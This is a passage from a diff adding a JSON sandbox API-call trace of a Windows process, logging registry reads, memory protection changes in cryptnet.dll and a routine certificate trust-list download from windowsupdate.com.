"0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2609 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x72dc21b7", + "parentcaller": "0x72da8ba3", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2610 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x72dc21b7", + "parentcaller": "0x72da8ba3", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\dhcpcsvc6" + }, + { + "name": "DllBase", + "value": "0x746c0000" + } + ], + "repeated": 0, + "id": 2611 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x72dc21b7", + "parentcaller": "0x72da8ba3", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\dhcpcsvc" + }, + { + "name": "DllBase", + "value": "0x74750000" + } + ], + "repeated": 0, + "id": 2612 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x72dc21b7", + "parentcaller": "0x72da8ba3", + "category": "network", + "api": "WinHttpOpen", + "status": true, + "return": "0x0057a440", + "arguments": [ + { + "name": "UserAgent", + "value": "Microsoft-CryptoAPI/10.0" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "AccessType", + "value": "0x00000004" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2613 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x74206110", + "parentcaller": "0x742070f0", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x0057a440" + }, + { + "name": "Option", + "value": "0x00000053" + }, + { + "name": "Buffer", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2614 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756b7eb6", + "parentcaller": "0x742061b8", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2615 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x742061fd", + "parentcaller": "0x74204cf6", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2616 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2617 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2618 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x74204e96", + "parentcaller": "0x74207114", + "category": "network", + "api": "WinHttpConnect", + "status": true, + "return": "0x05852458", + "arguments": [ + { + "name": "SessionHandle", + "value": "0x0057a440" + }, + { + "name": "ServerName", + "value": "ctldl.windowsupdate.com" + }, + { + "name": "ServerPort", + "value": "80" + } + ], + "repeated": 0, + "id": 2619 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x74204eec", + "parentcaller": "0x74207114", + "category": "network", + "api": "WinHttpOpenRequest", + "status": true, + "return": "0x05852580", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852458" + }, + { + "name": "Verb", + "value": "" + }, + { + "name": "ObjectName", + "value": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca2805d6df8dd1d0" + }, + { + "name": "Version", + "value": "" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2620 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756b7eb6", + "parentcaller": "0x7420d081", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2621 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2622 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2623 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756ba174", + "parentcaller": "0x74598c38", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000728" + } + ], + "repeated": 0, + "id": 2624 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x74598c8e", + "parentcaller": "0x745986ae", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2625 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756ba174", + "parentcaller": "0x745958cf", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x0000072c" + } + ], + "repeated": 0, + "id": 2626 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756b7eb6", + "parentcaller": "0x74599207", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xd8*V\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2627 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2628 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000072c" + }, + { + "name": "DesiredAccess", + "value": "0x000f003f", + "pretty_value": "KEY_ALL_ACCESS" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" + } + ], + "repeated": 0, + "id": 2629 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000072c" + }, + { + "name": "ValueName", + "value": "Local AppData" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" + } + ], + "repeated": 0, + "id": 2630 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000072c" + }, + { + "name": "ValueName", + "value": "Local AppData" + }, + { + "name": "Type", + "value": "2", + "pretty_value": "REG_EXPAND_SZ" + }, + { + "name": "Information", + "value": "%USERPROFILE%\\AppData\\Local" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" + } + ], + "repeated": 0, + "id": 2631 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2632 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000730" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001" + } + ], + "repeated": 0, + "id": 2633 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000730" + }, + { + "name": "ValueName", + "value": "ProfileImagePath" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath" + } + ], + "repeated": 0, + "id": 2634 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000730" + }, + { + "name": "ValueName", + "value": "ProfileImagePath" + }, + { + "name": "Type", + "value": "2", + "pretty_value": "REG_EXPAND_SZ" + }, + { + "name": "Information", + "value": "C:\\Users\\pacop" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath" + } + ], + "repeated": 0, + "id": 2635 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756ba8d9", + "parentcaller": "0x7420d2f8", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow" + } + ], + "repeated": 0, + "id": 2636 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756dcd70", + "parentcaller": "0x7420d38d", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000728" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow" + }, + { + "name": "ShareAccess", + "value": "7", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 2637 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000720" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "1", + "pretty_value": "FILE_SHARE_READ" + }, + { + "name": "FileAttributes", + "value": "0x00000080", + "pretty_value": "FILE_ATTRIBUTE_NORMAL" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2638 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756c6ced", + "parentcaller": "0x7420666f", + "category": "filesystem", + "api": "NtQueryInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000720" + }, + { + "name": "HandleName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "FileInformationClass", + "value": "5", + "pretty_value": "FileStandardInformation" + }, + { + "name": "FileInformation", + "value": "(\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2639 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756b893c", + "parentcaller": "0x74206754", + "category": "filesystem", + "api": "NtReadFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000720" + }, + { + "name": "HandleName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "Buffer", + "value": "p\\x00\\x00\\x00" + }, + { + "name": "Length", + "value": "290" + } + ], + "repeated": 0, + "id": 2640 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x74203fb2", + "parentcaller": "0x74204f8b", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x05852580" + }, + { + "name": "Option", + "value": "0x0000004d" + }, + { + "name": "Buffer", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2641 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x72dbccc2", + "parentcaller": "0x72dbcb67", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 2642 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9156", + "caller": "0x756b8c89", + "parentcaller": "0x72d9cb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000071c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2643 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9156", + "caller": "0x73a000dc", + "parentcaller": "0x739ffb17", + "category": "network", + "api": "GetAddrInfoExW", + "status": false, + "return": "0x000003e5", + "arguments": [ + { + "name": "Name", + "value": "ctldl.windowsupdate.com" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 2644 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9156", + "caller": "0x76041941", + "parentcaller": "0x738c7123", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\xf72\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\xf72\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x08\\xf72\\x05#q\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2645 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05853000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2646 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9156", + "caller": "0x739d16b1", + "parentcaller": "0x7554148c", + "category": "filesystem", + "api": "NtCreateFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000003", + "pretty_value": "FILE_READ_ACCESS|FILE_WRITE_ACCESS" + }, + { + "name": "FileName", + "value": "\\Device\\RasAcd" + }, + { + "name": "CreateDisposition", + "value": "3", + "pretty_value": "FILE_OPEN_IF" + }, + { + "name": "ShareAccess", + "value": "3", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" + }, + { + "name": "FileAttributes", + "value": "0x00000080", + "pretty_value": "FILE_ATTRIBUTE_NORMAL" + }, + { + "name": "ExistedBefore", + "value": "no" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2647 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9156", + "caller": "0x7553dc64", + "parentcaller": "0x75544f9e", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x00000744", + "arguments": [ + { + "name": "af", + "value": "23", + "pretty_value": "AF_INET6" + }, + { + "name": "type", + "value": "2", + "pretty_value": "SOCK_DGRAM" + }, + { + "name": "protocol", + "value": "0" + }, + { + "name": "socket", + "value": "1860" + } + ], + "repeated": 0, + "id": 2648 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9156", + "caller": "0x6db8a714", + "parentcaller": "0x7553dd57", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000103", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000744" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19\\x00\\x00\\xc8\\x01\\x00\\x00\\x00\\x18,V\\x00\\x14\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\x00\\x00\\xb8\\x0b\\x85\\x05\\x1c\\x00\\x00\\x00\\xd4\\x0b\\x85\\x05\\x1c\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2649 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9156", + "caller": "0x6db8a9c5", + "parentcaller": "0x6db8a75c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000040c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2650 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x739ff7b6", + "parentcaller": "0x739ffd35", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2651 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x73a0b752", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x0000074c", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1868" + } + ], + "repeated": 0, + "id": 2652 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x73a0b827", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00003007" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2653 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x73a0b878", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 2654 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x73a0b8dc", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2655 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x76112466", + "parentcaller": "0x73a0ba78", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000074c" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2656 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000074c" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "X\\x00\\x00\\x00\\xd84O\\x00" + } + ], + "repeated": 0, + "id": 2657 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "5164", + "caller": "0x739fee81", + "parentcaller": "0x73a11fa6", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1868" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "199.232.210.172" + }, + { + "name": "port", + "value": "80" + } + ], + "repeated": 0, + 